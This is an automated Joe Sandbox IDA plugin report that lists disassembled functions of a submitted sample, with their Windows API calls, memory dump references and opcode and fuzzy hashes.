ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C417,00000004,00000000,00000000,00000000), ref: 0077C4D6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e56b09644d14eb17d772f763626af8bfd7462cf44a6e9073ac25e864579c64e0
Instruction ID: fe0f39db565c08c7c2ded63c5c65075e36318be8394fa8c2e30e001288d03f67
Opcode Fuzzy Hash: e56b09644d14eb17d772f763626af8bfd7462cf44a6e9073ac25e864579c64e0
Instruction Fuzzy Hash: AA4109313047C0AACB368B289C9CB7A7B92EB46300F98C81DFC4B96562D77D9867D711

Function 007A7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007A737F

Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007A73B6
EnterCriticalSection.KERNEL32(?), ref: 007A73D2
_memmove.LIBCMT ref: 007A7420
_memmove.LIBCMT ref: 007A743D
LeaveCriticalSection.KERNEL32(?), ref: 007A744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007A7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 007A7480

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 52706fd41c48cfc528786730cd5e4fb0d715d2622757ea88f4f791fc6f4711cb
Instruction ID: 2dd99ce8f3e731823fb13e2b5c9f4ce325c2ff8782aa1cdb07f24249cf01bdc0
Opcode Fuzzy Hash: 52706fd41c48cfc528786730cd5e4fb0d715d2622757ea88f4f791fc6f4711cb
Instruction Fuzzy Hash: CF315E71904205EBCF10DF54DC89EAF7B78FF45710B1481A9FD05AB246DB389A14DBA4

Function 007C6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007C645A
GetDC.USER32(00000000), ref: 007C6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C646D
ReleaseDC.USER32(00000000,00000000), ref: 007C6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007C64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007C9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007C6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C6520

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0f7b148435aa437e337aab6df0ebc80c63f3adddc382c860035075f3a692ecc2
Instruction ID: e20adb1e902ad624a568a56617864ef936e5923b15c06f6289b10144af4e798a
Opcode Fuzzy Hash: 0f7b148435aa437e337aab6df0ebc80c63f3adddc382c860035075f3a692ecc2
Instruction Fuzzy Hash: 49317172101214BFEB118F50DC8AFEA3FAAEF09761F044069FE08EA291D6799C51CB64

Function 0079C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0079C087
_memcmp.LIBCMT ref: 0079C0A9
_memcmp.LIBCMT ref: 0079C0C1
_memcmp.LIBCMT ref: 0079C0D4
_memcmp.LIBCMT ref: 0079C0EE
_memcmp.LIBCMT ref: 0079C101
_memcmp.LIBCMT ref: 0079C119
_memcmp.LIBCMT ref: 0079C134

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 77806152166b8e4de3732fbf2727b582039b5fccc4ecf06f9b957c8082da8783
Instruction ID: d3ced51db49e95f389d9ff3b3ea37667f3da85f7285b8a409d8aca1ac98c503c
Opcode Fuzzy Hash: 77806152166b8e4de3732fbf2727b582039b5fccc4ecf06f9b957c8082da8783
Instruction Fuzzy Hash: 4221C5A5740209F7DE16A524AD4AFBB336CAF20394F480021FD0A96383EB9DDE12C5B5

Function 007AED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9

_wcstok.LIBCMT ref: 007AEEFF
_wcscpy.LIBCMT ref: 007AEF8E
_memset.LIBCMT ref: 007AEFC1

Strings

X, xrefs: 007AEFFE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3e0a2e67ff937c9f73b83a6a07c96bcd1a729d14a33631701d8b217b1ad7b11c
Instruction ID: 8a4bb28cfc8f137a90101e6f102bdc5b2073b6d9cf3d7ae3c3a945b1e218202f
Opcode Fuzzy Hash: 3e0a2e67ff937c9f73b83a6a07c96bcd1a729d14a33631701d8b217b1ad7b11c
Instruction Fuzzy Hash: 83C15E71608340DFC714EF64C889A5BB7E4EF85310F044A2DF999972A2DB38ED45CB92

Function 00741424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0df0869582e175b50b10455c4faf6d7be59d0383ee8612273fe21e18704b43
Instruction ID: 7cea7008b06800937215fd80c0f608d5b79ba23e21d66c47aa918031c130bb4c
Opcode Fuzzy Hash: ea0df0869582e175b50b10455c4faf6d7be59d0383ee8612273fe21e18704b43
Instruction Fuzzy Hash: 53714930900109EFCB04EF98CC89ABEBB79FF85354F548159F915AA251C738AA91CFA4

Function 007B6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88fbe202fe905c3a283b5aa9abc0c3d64a4034f9a554c46eaf8163d105e6404
Instruction ID: 5ab8c90be5a941e3e2a6b4d49e80d485e20a60253ed15fcea3c85e7182cfb568
Opcode Fuzzy Hash: d88fbe202fe905c3a283b5aa9abc0c3d64a4034f9a554c46eaf8163d105e6404
Instruction Fuzzy Hash: 98619D71508300EBC714EB24CC8AFAFB7E9AF84714F548A1DF6559B292DB789D04C792

Function 007CB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01685788), ref: 007CB6A5
IsWindowEnabled.USER32(01685788), ref: 007CB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007CB795
SendMessageW.USER32(01685788,000000B0,?,?), ref: 007CB7CC
IsDlgButtonChecked.USER32(?,?), ref: 007CB809
GetWindowLongW.USER32(01685788,000000EC), ref: 007CB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007CB843

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 4b9931c1d305c0e134107d0a4671b027242f8bdb47e2054c90c9e6f422b6dac7
Instruction ID: a9a711a9eb0d7abe3720eb0868ed829f0d2376fc5a429ec298adfe5898edf307
Opcode Fuzzy Hash: 4b9931c1d305c0e134107d0a4671b027242f8bdb47e2054c90c9e6f422b6dac7
Instruction Fuzzy Hash: ED717B34600204EFDB259FA4C896FBA7BB9FF49300F14406EF946A72A1C739A961DB54

Function 007BF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007BF75C
_memset.LIBCMT ref: 007BF825
ShellExecuteExW.SHELL32(?), ref: 007BF86A

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9

GetProcessId.KERNEL32(00000000), ref: 007BF8E1
CloseHandle.KERNEL32(00000000), ref: 007BF910

Strings

@, xrefs: 007BF839

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 53a0f070590770d5537c68ab7bd5c1d54bfd2fc6b36593443717545dc4a2042f
Instruction ID: 72473310afa3ef2986645c98dc849b8f272220c5d4b05c87bfc902c059eb9c75
Opcode Fuzzy Hash: 53a0f070590770d5537c68ab7bd5c1d54bfd2fc6b36593443717545dc4a2042f
Instruction Fuzzy Hash: 21619175A00619DFCF14DF64C889AAEBBF5FF49710F148469E846AB351DB38AE40CB90

Function 007A145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 007A149C
GetKeyboardState.USER32(?), ref: 007A14B1
SetKeyboardState.USER32(?), ref: 007A1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 007A1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 007A155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 007A15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007A15C8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
Instruction ID: dea99fbb1171aa78a51f49bb6313ab7c9ec9c623ca9092660c57724debe0ed6e
Opcode Fuzzy Hash: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
Instruction Fuzzy Hash: 6B51E3A0A047D53EFB3646388C49BBABFA95B87304F4C8689E1D5968C2C7DCEC94D750

Function 007A1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007A12B5
GetKeyboardState.USER32(?), ref: 007A12CA
SetKeyboardState.USER32(?), ref: 007A132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A13D9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
Instruction ID: 13a84f0a77030e3236216f1570880e5b60e27362b9f5c1ff58f86e878011df2e
Opcode Fuzzy Hash: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
Instruction Fuzzy Hash: CB51F5A0A047D57DFF3287248C55BBABFA96F87300F488689E1D45A8C2D39DEC94D760

Function 007A589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 007A58AC
_wcsncpy.LIBCMT ref: 007A58E1
_wcsncpy.LIBCMT ref: 007A5913
_wcsncpy.LIBCMT ref: 007A5946
_wcsncpy.LIBCMT ref: 007A5988
_wcsncpy.LIBCMT ref: 007A59C2
_wcsncpy.LIBCMT ref: 007A59F1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: effef77e7da6996b99151d3bcf21fb0d6ac692929d7132f3711c370b3ce96cf8
Instruction ID: 69f0f1ecff2175bc05423447bb0cbfb1046a36513bc623b68f473bcf5b0e4938
Opcode Fuzzy Hash: effef77e7da6996b99151d3bcf21fb0d6ac692929d7132f3711c370b3ce96cf8
Instruction Fuzzy Hash: 8A41B465D20528BACB10EBB4C88E9CF77A8AF05710F508562F919E3122F738E715C7A9

Function 0079DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0079DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0079DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0079DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0079DB8E

Strings

,,}, xrefs: 0079DA69
DllGetClassObject, xrefs: 0079DB01

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,}$DllGetClassObject
API String ID: 753597075-3102866830
Opcode ID: 95234b0b5aa39459c5bec4c14192e92afc723eaf4dd867d442d8872fb792cf07
Instruction ID: 90823a02f4ca3c37f890400dd8333bb1436af14033872b77ef078ddd3a611282
Opcode Fuzzy Hash: 95234b0b5aa39459c5bec4c14192e92afc723eaf4dd867d442d8872fb792cf07
Instruction Fuzzy Hash: A34173B1600208EFDF25CF55D884A9A7BBAEF44350F1580AEED059F205D7B9DD44DBA0

Function 007A38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A38D3,?), ref: 007A48C7

Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A38D3,?), ref: 007A48E0

lstrcmpiW.KERNEL32(?,?), ref: 007A38F3
_wcscmp.LIBCMT ref: 007A390F
MoveFileW.KERNEL32(?,?), ref: 007A3927
_wcscat.LIBCMT ref: 007A396F
SHFileOperationW.SHELL32(?), ref: 007A39DB

Strings

\*.*, xrefs: 007A3969

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: ff396776b7224d9855497e0bc3ea9c0bcac7025839e42b06517b7f41f0750f56
Instruction ID: 35906942c65a66e11a8619dbe45c4e7caa15a8655528c42b05fe0898aee672e9
Opcode Fuzzy Hash: ff396776b7224d9855497e0bc3ea9c0bcac7025839e42b06517b7f41f0750f56
Instruction Fuzzy Hash: C7417EB250C3849AC755EF64C4859EBB7E8AFC9344F000A2EB48AC3151EB7DE649C752

Function 007C7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C75C0
IsMenu.USER32(?), ref: 007C75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C7620
DrawMenuBar.USER32 ref: 007C7633

Strings

0, xrefs: 007C750D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 366a9ee8e53184603213ccc64e4331a8af3842ffd211bfd602faeae92e9d87ad
Instruction ID: 6e292fd27c2fd8aac3e4d5fbdd21cba43513a23c5378f7b96d61705732d97703
Opcode Fuzzy Hash: 366a9ee8e53184603213ccc64e4331a8af3842ffd211bfd602faeae92e9d87ad
Instruction Fuzzy Hash: C9412975A04609EFDB14DF54E885E9ABBF9FB04310F04812DE915A7250DB34AD60CF90

Function 007C122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007C125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C1286
FreeLibrary.KERNEL32(00000000), ref: 007C133D

Part of subcall function 007C122D: RegCloseKey.ADVAPI32(?), ref: 007C12A3
Part of subcall function 007C122D: FreeLibrary.KERNEL32(?), ref: 007C12F5
